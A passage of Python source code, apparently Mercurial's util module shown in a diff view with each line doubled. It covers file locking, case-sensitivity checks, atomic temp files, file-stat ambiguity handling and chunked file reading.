1872 os.write(ld, info)
1873 os.close(ld)
1873 os.close(ld)
1874
1874
1875 def readlock(pathname):
1875 def readlock(pathname):
1876 try:
1876 try:
1877 return readlink(pathname)
1877 return readlink(pathname)
1878 except OSError as why:
1878 except OSError as why:
1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1879 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1880 raise
1880 raise
1881 except AttributeError: # no symlink in os
1881 except AttributeError: # no symlink in os
1882 pass
1882 pass
1883 with posixfile(pathname, 'rb') as fp:
1883 with posixfile(pathname, 'rb') as fp:
1884 return fp.read()
1884 return fp.read()
1885
1885
1886 def fstat(fp):
1886 def fstat(fp):
1887 '''stat file object that may not have fileno method.'''
1887 '''stat file object that may not have fileno method.'''
1888 try:
1888 try:
1889 return os.fstat(fp.fileno())
1889 return os.fstat(fp.fileno())
1890 except AttributeError:
1890 except AttributeError:
1891 return os.stat(fp.name)
1891 return os.stat(fp.name)
1892
1892
1893 # File system features
1893 # File system features
1894
1894
1895 def fscasesensitive(path):
1895 def fscasesensitive(path):
1896 """
1896 """
1897 Return true if the given path is on a case-sensitive filesystem
1897 Return true if the given path is on a case-sensitive filesystem
1898
1898
1899 Requires a path (like /foo/.hg) ending with a foldable final
1899 Requires a path (like /foo/.hg) ending with a foldable final
1900 directory component.
1900 directory component.
1901 """
1901 """
1902 s1 = os.lstat(path)
1902 s1 = os.lstat(path)
1903 d, b = os.path.split(path)
1903 d, b = os.path.split(path)
1904 b2 = b.upper()
1904 b2 = b.upper()
1905 if b == b2:
1905 if b == b2:
1906 b2 = b.lower()
1906 b2 = b.lower()
1907 if b == b2:
1907 if b == b2:
1908 return True # no evidence against case sensitivity
1908 return True # no evidence against case sensitivity
1909 p2 = os.path.join(d, b2)
1909 p2 = os.path.join(d, b2)
1910 try:
1910 try:
1911 s2 = os.lstat(p2)
1911 s2 = os.lstat(p2)
1912 if s2 == s1:
1912 if s2 == s1:
1913 return False
1913 return False
1914 return True
1914 return True
1915 except OSError:
1915 except OSError:
1916 return True
1916 return True
1917
1917
1918 try:
1918 try:
1919 import re2
1919 import re2
1920 _re2 = None
1920 _re2 = None
1921 except ImportError:
1921 except ImportError:
1922 _re2 = False
1922 _re2 = False
1923
1923
1924 class _re(object):
1924 class _re(object):
1925 def _checkre2(self):
1925 def _checkre2(self):
1926 global _re2
1926 global _re2
1927 try:
1927 try:
1928 # check if match works, see issue3964
1928 # check if match works, see issue3964
1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1929 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1930 except ImportError:
1930 except ImportError:
1931 _re2 = False
1931 _re2 = False
1932
1932
1933 def compile(self, pat, flags=0):
1933 def compile(self, pat, flags=0):
1934 '''Compile a regular expression, using re2 if possible
1934 '''Compile a regular expression, using re2 if possible
1935
1935
1936 For best performance, use only re2-compatible regexp features. The
1936 For best performance, use only re2-compatible regexp features. The
1937 only flags from the re module that are re2-compatible are
1937 only flags from the re module that are re2-compatible are
1938 IGNORECASE and MULTILINE.'''
1938 IGNORECASE and MULTILINE.'''
1939 if _re2 is None:
1939 if _re2 is None:
1940 self._checkre2()
1940 self._checkre2()
1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1941 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1942 if flags & remod.IGNORECASE:
1942 if flags & remod.IGNORECASE:
1943 pat = '(?i)' + pat
1943 pat = '(?i)' + pat
1944 if flags & remod.MULTILINE:
1944 if flags & remod.MULTILINE:
1945 pat = '(?m)' + pat
1945 pat = '(?m)' + pat
1946 try:
1946 try:
1947 return re2.compile(pat)
1947 return re2.compile(pat)
1948 except re2.error:
1948 except re2.error:
1949 pass
1949 pass
1950 return remod.compile(pat, flags)
1950 return remod.compile(pat, flags)
1951
1951
1952 @propertycache
1952 @propertycache
1953 def escape(self):
1953 def escape(self):
1954 '''Return the version of escape corresponding to self.compile.
1954 '''Return the version of escape corresponding to self.compile.
1955
1955
1956 This is imperfect because whether re2 or re is used for a particular
1956 This is imperfect because whether re2 or re is used for a particular
1957 function depends on the flags, etc, but it's the best we can do.
1957 function depends on the flags, etc, but it's the best we can do.
1958 '''
1958 '''
1959 global _re2
1959 global _re2
1960 if _re2 is None:
1960 if _re2 is None:
1961 self._checkre2()
1961 self._checkre2()
1962 if _re2:
1962 if _re2:
1963 return re2.escape
1963 return re2.escape
1964 else:
1964 else:
1965 return remod.escape
1965 return remod.escape
1966
1966
1967 re = _re()
1967 re = _re()
1968
1968
1969 _fspathcache = {}
1969 _fspathcache = {}
1970 def fspath(name, root):
1970 def fspath(name, root):
1971 '''Get name in the case stored in the filesystem
1971 '''Get name in the case stored in the filesystem
1972
1972
1973 The name should be relative to root, and be normcase-ed for efficiency.
1973 The name should be relative to root, and be normcase-ed for efficiency.
1974
1974
1975 Note that this function is unnecessary, and should not be
1975 Note that this function is unnecessary, and should not be
1976 called, for case-sensitive filesystems (simply because it's expensive).
1976 called, for case-sensitive filesystems (simply because it's expensive).
1977
1977
1978 The root should be normcase-ed, too.
1978 The root should be normcase-ed, too.
1979 '''
1979 '''
1980 def _makefspathcacheentry(dir):
1980 def _makefspathcacheentry(dir):
1981 return dict((normcase(n), n) for n in os.listdir(dir))
1981 return dict((normcase(n), n) for n in os.listdir(dir))
1982
1982
1983 seps = pycompat.ossep
1983 seps = pycompat.ossep
1984 if pycompat.osaltsep:
1984 if pycompat.osaltsep:
1985 seps = seps + pycompat.osaltsep
1985 seps = seps + pycompat.osaltsep
1986 # Protect backslashes. This gets silly very quickly.
1986 # Protect backslashes. This gets silly very quickly.
1987 seps.replace('\\','\\\\')
1987 seps.replace('\\','\\\\')
1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1988 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1989 dir = os.path.normpath(root)
1989 dir = os.path.normpath(root)
1990 result = []
1990 result = []
1991 for part, sep in pattern.findall(name):
1991 for part, sep in pattern.findall(name):
1992 if sep:
1992 if sep:
1993 result.append(sep)
1993 result.append(sep)
1994 continue
1994 continue
1995
1995
1996 if dir not in _fspathcache:
1996 if dir not in _fspathcache:
1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1997 _fspathcache[dir] = _makefspathcacheentry(dir)
1998 contents = _fspathcache[dir]
1998 contents = _fspathcache[dir]
1999
1999
2000 found = contents.get(part)
2000 found = contents.get(part)
2001 if not found:
2001 if not found:
2002 # retry "once per directory" per "dirstate.walk" which
2002 # retry "once per directory" per "dirstate.walk" which
2003 # may take place for each patches of "hg qpush", for example
2003 # may take place for each patches of "hg qpush", for example
2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2004 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2005 found = contents.get(part)
2005 found = contents.get(part)
2006
2006
2007 result.append(found or part)
2007 result.append(found or part)
2008 dir = os.path.join(dir, part)
2008 dir = os.path.join(dir, part)
2009
2009
2010 return ''.join(result)
2010 return ''.join(result)
2011
2011
2012 def checknlink(testfile):
2012 def checknlink(testfile):
2013 '''check whether hardlink count reporting works properly'''
2013 '''check whether hardlink count reporting works properly'''
2014
2014
2015 # testfile may be open, so we need a separate file for checking to
2015 # testfile may be open, so we need a separate file for checking to
2016 # work around issue2543 (or testfile may get lost on Samba shares)
2016 # work around issue2543 (or testfile may get lost on Samba shares)
2017 f1, f2, fp = None, None, None
2017 f1, f2, fp = None, None, None
2018 try:
2018 try:
2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2019 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
2020 suffix='1~', dir=os.path.dirname(testfile))
2020 suffix='1~', dir=os.path.dirname(testfile))
2021 os.close(fd)
2021 os.close(fd)
2022 f2 = '%s2~' % f1[:-2]
2022 f2 = '%s2~' % f1[:-2]
2023
2023
2024 oslink(f1, f2)
2024 oslink(f1, f2)
2025 # nlinks() may behave differently for files on Windows shares if
2025 # nlinks() may behave differently for files on Windows shares if
2026 # the file is open.
2026 # the file is open.
2027 fp = posixfile(f2)
2027 fp = posixfile(f2)
2028 return nlinks(f2) > 1
2028 return nlinks(f2) > 1
2029 except OSError:
2029 except OSError:
2030 return False
2030 return False
2031 finally:
2031 finally:
2032 if fp is not None:
2032 if fp is not None:
2033 fp.close()
2033 fp.close()
2034 for f in (f1, f2):
2034 for f in (f1, f2):
2035 try:
2035 try:
2036 if f is not None:
2036 if f is not None:
2037 os.unlink(f)
2037 os.unlink(f)
2038 except OSError:
2038 except OSError:
2039 pass
2039 pass
2040
2040
2041 def endswithsep(path):
2041 def endswithsep(path):
2042 '''Check path ends with os.sep or os.altsep.'''
2042 '''Check path ends with os.sep or os.altsep.'''
2043 return (path.endswith(pycompat.ossep)
2043 return (path.endswith(pycompat.ossep)
2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2044 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
2045
2045
2046 def splitpath(path):
2046 def splitpath(path):
2047 '''Split path by os.sep.
2047 '''Split path by os.sep.
2048 Note that this function does not use os.altsep because this is
2048 Note that this function does not use os.altsep because this is
2049 an alternative of simple "xxx.split(os.sep)".
2049 an alternative of simple "xxx.split(os.sep)".
2050 It is recommended to use os.path.normpath() before using this
2050 It is recommended to use os.path.normpath() before using this
2051 function if need.'''
2051 function if need.'''
2052 return path.split(pycompat.ossep)
2052 return path.split(pycompat.ossep)
2053
2053
2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2054 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2055 """Create a temporary file with the same contents from name
2055 """Create a temporary file with the same contents from name
2056
2056
2057 The permission bits are copied from the original file.
2057 The permission bits are copied from the original file.
2058
2058
2059 If the temporary file is going to be truncated immediately, you
2059 If the temporary file is going to be truncated immediately, you
2060 can use emptyok=True as an optimization.
2060 can use emptyok=True as an optimization.
2061
2061
2062 Returns the name of the temporary file.
2062 Returns the name of the temporary file.
2063 """
2063 """
2064 d, fn = os.path.split(name)
2064 d, fn = os.path.split(name)
2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2065 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
2066 os.close(fd)
2066 os.close(fd)
2067 # Temporary files are created with mode 0600, which is usually not
2067 # Temporary files are created with mode 0600, which is usually not
2068 # what we want. If the original file already exists, just copy
2068 # what we want. If the original file already exists, just copy
2069 # its mode. Otherwise, manually obey umask.
2069 # its mode. Otherwise, manually obey umask.
2070 copymode(name, temp, createmode, enforcewritable)
2070 copymode(name, temp, createmode, enforcewritable)
2071
2071
2072 if emptyok:
2072 if emptyok:
2073 return temp
2073 return temp
2074 try:
2074 try:
2075 try:
2075 try:
2076 ifp = posixfile(name, "rb")
2076 ifp = posixfile(name, "rb")
2077 except IOError as inst:
2077 except IOError as inst:
2078 if inst.errno == errno.ENOENT:
2078 if inst.errno == errno.ENOENT:
2079 return temp
2079 return temp
2080 if not getattr(inst, 'filename', None):
2080 if not getattr(inst, 'filename', None):
2081 inst.filename = name
2081 inst.filename = name
2082 raise
2082 raise
2083 ofp = posixfile(temp, "wb")
2083 ofp = posixfile(temp, "wb")
2084 for chunk in filechunkiter(ifp):
2084 for chunk in filechunkiter(ifp):
2085 ofp.write(chunk)
2085 ofp.write(chunk)
2086 ifp.close()
2086 ifp.close()
2087 ofp.close()
2087 ofp.close()
2088 except: # re-raises
2088 except: # re-raises
2089 try:
2089 try:
2090 os.unlink(temp)
2090 os.unlink(temp)
2091 except OSError:
2091 except OSError:
2092 pass
2092 pass
2093 raise
2093 raise
2094 return temp
2094 return temp
2095
2095
2096 class filestat(object):
2096 class filestat(object):
2097 """help to exactly detect change of a file
2097 """help to exactly detect change of a file
2098
2098
2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2099 'stat' attribute is result of 'os.stat()' if specified 'path'
2100 exists. Otherwise, it is None. This can avoid preparative
2100 exists. Otherwise, it is None. This can avoid preparative
2101 'exists()' examination on client side of this class.
2101 'exists()' examination on client side of this class.
2102 """
2102 """
2103 def __init__(self, stat):
2103 def __init__(self, stat):
2104 self.stat = stat
2104 self.stat = stat
2105
2105
2106 @classmethod
2106 @classmethod
2107 def frompath(cls, path):
2107 def frompath(cls, path):
2108 try:
2108 try:
2109 stat = os.stat(path)
2109 stat = os.stat(path)
2110 except OSError as err:
2110 except OSError as err:
2111 if err.errno != errno.ENOENT:
2111 if err.errno != errno.ENOENT:
2112 raise
2112 raise
2113 stat = None
2113 stat = None
2114 return cls(stat)
2114 return cls(stat)
2115
2115
2116 @classmethod
2116 @classmethod
2117 def fromfp(cls, fp):
2117 def fromfp(cls, fp):
2118 stat = os.fstat(fp.fileno())
2118 stat = os.fstat(fp.fileno())
2119 return cls(stat)
2119 return cls(stat)
2120
2120
2121 __hash__ = object.__hash__
2121 __hash__ = object.__hash__
2122
2122
2123 def __eq__(self, old):
2123 def __eq__(self, old):
2124 try:
2124 try:
2125 # if ambiguity between stat of new and old file is
2125 # if ambiguity between stat of new and old file is
2126 # avoided, comparison of size, ctime and mtime is enough
2126 # avoided, comparison of size, ctime and mtime is enough
2127 # to exactly detect change of a file regardless of platform
2127 # to exactly detect change of a file regardless of platform
2128 return (self.stat.st_size == old.stat.st_size and
2128 return (self.stat.st_size == old.stat.st_size and
2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2129 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2130 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2131 except AttributeError:
2131 except AttributeError:
2132 pass
2132 pass
2133 try:
2133 try:
2134 return self.stat is None and old.stat is None
2134 return self.stat is None and old.stat is None
2135 except AttributeError:
2135 except AttributeError:
2136 return False
2136 return False
2137
2137
2138 def isambig(self, old):
2138 def isambig(self, old):
2139 """Examine whether new (= self) stat is ambiguous against old one
2139 """Examine whether new (= self) stat is ambiguous against old one
2140
2140
2141 "S[N]" below means stat of a file at N-th change:
2141 "S[N]" below means stat of a file at N-th change:
2142
2142
2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2143 - S[n-1].ctime < S[n].ctime: can detect change of a file
2144 - S[n-1].ctime == S[n].ctime
2144 - S[n-1].ctime == S[n].ctime
2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2145 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2146 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2147 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2148 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2149
2149
2150 Case (*2) above means that a file was changed twice or more at
2150 Case (*2) above means that a file was changed twice or more at
2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2151 same time in sec (= S[n-1].ctime), and comparison of timestamp
2152 is ambiguous.
2152 is ambiguous.
2153
2153
2154 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2154 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2155 timestamp is ambiguous".
2155 timestamp is ambiguous".
2156
2156
2157 But advancing mtime only in case (*2) doesn't work as
2157 But advancing mtime only in case (*2) doesn't work as
2158 expected, because naturally advanced S[n].mtime in case (*1)
2158 expected, because naturally advanced S[n].mtime in case (*1)
2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2159 might be equal to manually advanced S[n-1 or earlier].mtime.
2160
2160
2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2161 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2162 treated as ambiguous regardless of mtime, to avoid overlooking
2162 treated as ambiguous regardless of mtime, to avoid overlooking
2163 by confliction between such mtime.
2163 by confliction between such mtime.
2164
2164
2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2165 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2166 S[n].mtime", even if size of a file isn't changed.
2166 S[n].mtime", even if size of a file isn't changed.
2167 """
2167 """
2168 try:
2168 try:
2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2169 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2170 except AttributeError:
2170 except AttributeError:
2171 return False
2171 return False
2172
2172
2173 def avoidambig(self, path, old):
2173 def avoidambig(self, path, old):
2174 """Change file stat of specified path to avoid ambiguity
2174 """Change file stat of specified path to avoid ambiguity
2175
2175
2176 'old' should be previous filestat of 'path'.
2176 'old' should be previous filestat of 'path'.
2177
2177
2178 This skips avoiding ambiguity, if a process doesn't have
2178 This skips avoiding ambiguity, if a process doesn't have
2179 appropriate privileges for 'path'. This returns False in this
2179 appropriate privileges for 'path'. This returns False in this
2180 case.
2180 case.
2181
2181
2182 Otherwise, this returns True, as "ambiguity is avoided".
2182 Otherwise, this returns True, as "ambiguity is avoided".
2183 """
2183 """
2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2184 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2185 try:
2185 try:
2186 os.utime(path, (advanced, advanced))
2186 os.utime(path, (advanced, advanced))
2187 except OSError as inst:
2187 except OSError as inst:
2188 if inst.errno == errno.EPERM:
2188 if inst.errno == errno.EPERM:
2189 # utime() on the file created by another user causes EPERM,
2189 # utime() on the file created by another user causes EPERM,
2190 # if a process doesn't have appropriate privileges
2190 # if a process doesn't have appropriate privileges
2191 return False
2191 return False
2192 raise
2192 raise
2193 return True
2193 return True
2194
2194
2195 def __ne__(self, other):
2195 def __ne__(self, other):
2196 return not self == other
2196 return not self == other
2197
2197
2198 class atomictempfile(object):
2198 class atomictempfile(object):
2199 '''writable file object that atomically updates a file
2199 '''writable file object that atomically updates a file
2200
2200
2201 All writes will go to a temporary copy of the original file. Call
2201 All writes will go to a temporary copy of the original file. Call
2202 close() when you are done writing, and atomictempfile will rename
2202 close() when you are done writing, and atomictempfile will rename
2203 the temporary copy to the original name, making the changes
2203 the temporary copy to the original name, making the changes
2204 visible. If the object is destroyed without being closed, all your
2204 visible. If the object is destroyed without being closed, all your
2205 writes are discarded.
2205 writes are discarded.
2206
2206
2207 checkambig argument of constructor is used with filestat, and is
2207 checkambig argument of constructor is used with filestat, and is
2208 useful only if target file is guarded by any lock (e.g. repo.lock
2208 useful only if target file is guarded by any lock (e.g. repo.lock
2209 or repo.wlock).
2209 or repo.wlock).
2210 '''
2210 '''
2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2211 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2212 self.__name = name # permanent name
2212 self.__name = name # permanent name
2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2213 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2214 createmode=createmode,
2214 createmode=createmode,
2215 enforcewritable=('w' in mode))
2215 enforcewritable=('w' in mode))
2216
2216
2217 self._fp = posixfile(self._tempname, mode)
2217 self._fp = posixfile(self._tempname, mode)
2218 self._checkambig = checkambig
2218 self._checkambig = checkambig
2219
2219
2220 # delegated methods
2220 # delegated methods
2221 self.read = self._fp.read
2221 self.read = self._fp.read
2222 self.write = self._fp.write
2222 self.write = self._fp.write
2223 self.seek = self._fp.seek
2223 self.seek = self._fp.seek
2224 self.tell = self._fp.tell
2224 self.tell = self._fp.tell
2225 self.fileno = self._fp.fileno
2225 self.fileno = self._fp.fileno
2226
2226
2227 def close(self):
2227 def close(self):
2228 if not self._fp.closed:
2228 if not self._fp.closed:
2229 self._fp.close()
2229 self._fp.close()
2230 filename = localpath(self.__name)
2230 filename = localpath(self.__name)
2231 oldstat = self._checkambig and filestat.frompath(filename)
2231 oldstat = self._checkambig and filestat.frompath(filename)
2232 if oldstat and oldstat.stat:
2232 if oldstat and oldstat.stat:
2233 rename(self._tempname, filename)
2233 rename(self._tempname, filename)
2234 newstat = filestat.frompath(filename)
2234 newstat = filestat.frompath(filename)
2235 if newstat.isambig(oldstat):
2235 if newstat.isambig(oldstat):
2236 # stat of changed file is ambiguous to original one
2236 # stat of changed file is ambiguous to original one
2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2237 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2238 os.utime(filename, (advanced, advanced))
2238 os.utime(filename, (advanced, advanced))
2239 else:
2239 else:
2240 rename(self._tempname, filename)
2240 rename(self._tempname, filename)
2241
2241
2242 def discard(self):
2242 def discard(self):
2243 if not self._fp.closed:
2243 if not self._fp.closed:
2244 try:
2244 try:
2245 os.unlink(self._tempname)
2245 os.unlink(self._tempname)
2246 except OSError:
2246 except OSError:
2247 pass
2247 pass
2248 self._fp.close()
2248 self._fp.close()
2249
2249
2250 def __del__(self):
2250 def __del__(self):
2251 if safehasattr(self, '_fp'): # constructor actually did something
2251 if safehasattr(self, '_fp'): # constructor actually did something
2252 self.discard()
2252 self.discard()
2253
2253
2254 def __enter__(self):
2254 def __enter__(self):
2255 return self
2255 return self
2256
2256
2257 def __exit__(self, exctype, excvalue, traceback):
2257 def __exit__(self, exctype, excvalue, traceback):
2258 if exctype is not None:
2258 if exctype is not None:
2259 self.discard()
2259 self.discard()
2260 else:
2260 else:
2261 self.close()
2261 self.close()
2262
2262
2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2264 """unlink and remove the directory if it is empty"""
2264 """unlink and remove the directory if it is empty"""
2265 if ignoremissing:
2265 if ignoremissing:
2266 tryunlink(f)
2266 tryunlink(f)
2267 else:
2267 else:
2268 unlink(f)
2268 unlink(f)
2269 if rmdir:
2269 if rmdir:
2270 # try removing directories that might now be empty
2270 # try removing directories that might now be empty
2271 try:
2271 try:
2272 removedirs(os.path.dirname(f))
2272 removedirs(os.path.dirname(f))
2273 except OSError:
2273 except OSError:
2274 pass
2274 pass
2275
2275
2276 def tryunlink(f):
2276 def tryunlink(f):
2277 """Attempt to remove a file, ignoring ENOENT errors."""
2277 """Attempt to remove a file, ignoring ENOENT errors."""
2278 try:
2278 try:
2279 unlink(f)
2279 unlink(f)
2280 except OSError as e:
2280 except OSError as e:
2281 if e.errno != errno.ENOENT:
2281 if e.errno != errno.ENOENT:
2282 raise
2282 raise
2283
2283
2284 def makedirs(name, mode=None, notindexed=False):
2284 def makedirs(name, mode=None, notindexed=False):
2285 """recursive directory creation with parent mode inheritance
2285 """recursive directory creation with parent mode inheritance
2286
2286
2287 Newly created directories are marked as "not to be indexed by
2287 Newly created directories are marked as "not to be indexed by
2288 the content indexing service", if ``notindexed`` is specified
2288 the content indexing service", if ``notindexed`` is specified
2289 for "write" mode access.
2289 for "write" mode access.
2290 """
2290 """
2291 try:
2291 try:
2292 makedir(name, notindexed)
2292 makedir(name, notindexed)
2293 except OSError as err:
2293 except OSError as err:
2294 if err.errno == errno.EEXIST:
2294 if err.errno == errno.EEXIST:
2295 return
2295 return
2296 if err.errno != errno.ENOENT or not name:
2296 if err.errno != errno.ENOENT or not name:
2297 raise
2297 raise
2298 parent = os.path.dirname(os.path.abspath(name))
2298 parent = os.path.dirname(os.path.abspath(name))
2299 if parent == name:
2299 if parent == name:
2300 raise
2300 raise
2301 makedirs(parent, mode, notindexed)
2301 makedirs(parent, mode, notindexed)
2302 try:
2302 try:
2303 makedir(name, notindexed)
2303 makedir(name, notindexed)
2304 except OSError as err:
2304 except OSError as err:
2305 # Catch EEXIST to handle races
2305 # Catch EEXIST to handle races
2306 if err.errno == errno.EEXIST:
2306 if err.errno == errno.EEXIST:
2307 return
2307 return
2308 raise
2308 raise
2309 if mode is not None:
2309 if mode is not None:
2310 os.chmod(name, mode)
2310 os.chmod(name, mode)
2311
2311
2312 def readfile(path):
2312 def readfile(path):
2313 with open(path, 'rb') as fp:
2313 with open(path, 'rb') as fp:
2314 return fp.read()
2314 return fp.read()
2315
2315
2316 def writefile(path, text):
2316 def writefile(path, text):
2317 with open(path, 'wb') as fp:
2317 with open(path, 'wb') as fp:
2318 fp.write(text)
2318 fp.write(text)
2319
2319
2320 def appendfile(path, text):
2320 def appendfile(path, text):
2321 with open(path, 'ab') as fp:
2321 with open(path, 'ab') as fp:
2322 fp.write(text)
2322 fp.write(text)
2323
2323
2324 class chunkbuffer(object):
2324 class chunkbuffer(object):
2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2326 iterator over chunks of arbitrary size."""
2326 iterator over chunks of arbitrary size."""
2327
2327
2328 def __init__(self, in_iter):
2328 def __init__(self, in_iter):
2329 """in_iter is the iterator that's iterating over the input chunks."""
2329 """in_iter is the iterator that's iterating over the input chunks."""
2330 def splitbig(chunks):
2330 def splitbig(chunks):
2331 for chunk in chunks:
2331 for chunk in chunks:
2332 if len(chunk) > 2**20:
2332 if len(chunk) > 2**20:
2333 pos = 0
2333 pos = 0
2334 while pos < len(chunk):
2334 while pos < len(chunk):
2335 end = pos + 2 ** 18
2335 end = pos + 2 ** 18
2336 yield chunk[pos:end]
2336 yield chunk[pos:end]
2337 pos = end
2337 pos = end
2338 else:
2338 else:
2339 yield chunk
2339 yield chunk
2340 self.iter = splitbig(in_iter)
2340 self.iter = splitbig(in_iter)
2341 self._queue = collections.deque()
2341 self._queue = collections.deque()
2342 self._chunkoffset = 0
2342 self._chunkoffset = 0
2343
2343
2344 def read(self, l=None):
2344 def read(self, l=None):
2345 """Read L bytes of data from the iterator of chunks of data.
2345 """Read L bytes of data from the iterator of chunks of data.
2346 Returns less than L bytes if the iterator runs dry.
2346 Returns less than L bytes if the iterator runs dry.
2347
2347
2348 If size parameter is omitted, read everything"""
2348 If size parameter is omitted, read everything"""
2349 if l is None:
2349 if l is None:
2350 return ''.join(self.iter)
2350 return ''.join(self.iter)
2351
2351
2352 left = l
2352 left = l
2353 buf = []
2353 buf = []
2354 queue = self._queue
2354 queue = self._queue
2355 while left > 0:
2355 while left > 0:
2356 # refill the queue
2356 # refill the queue
2357 if not queue:
2357 if not queue:
2358 target = 2**18
2358 target = 2**18
2359 for chunk in self.iter:
2359 for chunk in self.iter:
2360 queue.append(chunk)
2360 queue.append(chunk)
2361 target -= len(chunk)
2361 target -= len(chunk)
2362 if target <= 0:
2362 if target <= 0:
2363 break
2363 break
2364 if not queue:
2364 if not queue:
2365 break
2365 break
2366
2366
2367 # The easy way to do this would be to queue.popleft(), modify the
2367 # The easy way to do this would be to queue.popleft(), modify the
2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2369 # where we read partial chunk content, this incurs 2 dequeue
2369 # where we read partial chunk content, this incurs 2 dequeue
2370 # mutations and creates a new str for the remaining chunk in the
2370 # mutations and creates a new str for the remaining chunk in the
2371 # queue. Our code below avoids this overhead.
2371 # queue. Our code below avoids this overhead.
2372
2372
2373 chunk = queue[0]
2373 chunk = queue[0]
2374 chunkl = len(chunk)
2374 chunkl = len(chunk)
2375 offset = self._chunkoffset
2375 offset = self._chunkoffset
2376
2376
2377 # Use full chunk.
2377 # Use full chunk.
2378 if offset == 0 and left >= chunkl:
2378 if offset == 0 and left >= chunkl:
2379 left -= chunkl
2379 left -= chunkl
2380 queue.popleft()
2380 queue.popleft()
2381 buf.append(chunk)
2381 buf.append(chunk)
2382 # self._chunkoffset remains at 0.
2382 # self._chunkoffset remains at 0.
2383 continue
2383 continue
2384
2384
2385 chunkremaining = chunkl - offset
2385 chunkremaining = chunkl - offset
2386
2386
2387 # Use all of unconsumed part of chunk.
2387 # Use all of unconsumed part of chunk.
2388 if left >= chunkremaining:
2388 if left >= chunkremaining:
2389 left -= chunkremaining
2389 left -= chunkremaining
2390 queue.popleft()
2390 queue.popleft()
2391 # offset == 0 is enabled by block above, so this won't merely
2391 # offset == 0 is enabled by block above, so this won't merely
2392 # copy via ``chunk[0:]``.
2392 # copy via ``chunk[0:]``.
2393 buf.append(chunk[offset:])
2393 buf.append(chunk[offset:])
2394 self._chunkoffset = 0
2394 self._chunkoffset = 0
2395
2395
2396 # Partial chunk needed.
2396 # Partial chunk needed.
2397 else:
2397 else:
2398 buf.append(chunk[offset:offset + left])
2398 buf.append(chunk[offset:offset + left])
2399 self._chunkoffset += left
2399 self._chunkoffset += left
2400 left -= chunkremaining
2400 left -= chunkremaining
2401
2401
2402 return ''.join(buf)
2402 return ''.join(buf)
2403
2403
2404 def filechunkiter(f, size=131072, limit=None):
2404 def filechunkiter(f, size=131072, limit=None):
2405 """Create a generator that produces the data in the file size
2405 """Create a generator that produces the data in the file size
2406 (default 131072) bytes at a time, up to optional limit (default is
2406 (default 131072) bytes at a time, up to optional limit (default is
2407 to read all data). Chunks may be less than size bytes if the
2407 to read all data). Chunks may be less than size bytes if the
2408 chunk is the last chunk in the file, or the file is a socket or
2408 chunk is the last chunk in the file, or the file is a socket or
2409 some other type of file that sometimes reads less data than is
2409 some other type of file that sometimes reads less data than is
2410 requested."""
2410 requested."""
2411 assert size >= 0
2411 assert size >= 0
2412 assert limit is None or limit >= 0
2412 assert limit is None or limit >= 0
2413 while True:
2413 while True:
2414 if limit is None:
2414 if limit is None:
2415 nbytes = size
2415 nbytes = size
2416 else:
2416 else:
2417 nbytes = min(limit, size)
2417 nbytes = min(limit, size)
2418 s = nbytes and f.read(nbytes)
